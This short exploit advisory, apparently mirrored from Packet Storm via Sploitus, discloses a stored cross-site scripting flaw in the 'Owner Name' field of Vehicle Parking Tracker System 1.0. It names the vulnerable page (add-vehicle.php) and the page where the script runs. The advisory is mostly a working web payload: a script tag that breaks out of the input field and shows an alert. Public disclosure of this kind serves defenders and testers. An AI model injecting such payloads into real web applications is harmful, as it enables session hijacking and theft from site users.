Share
## https://sploitus.com/exploit?id=PACKETSTORM:161223
# Exploit Title: Vehicle Parking Tracker System 1.0 - 'Owner Name' Stored Cross-Site Scripting  
# Date: 2021-01-30  
# Exploit Author: Anmol K Sachan  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/vehicle-parking-management-system-using-php-and-mysql/  
# Software: : Vehicle Parking Tracker System   
# Version : 1.0  
# Vulnerability Type: Cross-site Scripting  
# Tested on Windows 10 XAMPP  
# This application is vulnerable to Stored XSS vulnerability.  
# Vulnerable script:  
  
1) http://localhost/vpms/add-vehicle.php  
# Vulnerable parameters: 'Owner Name'  
# Payload used: ()"><script>alert(‘document.cookie’)</script>  
# POC: manage-incomingvehicle.php  
# You will see your Javascript code executed.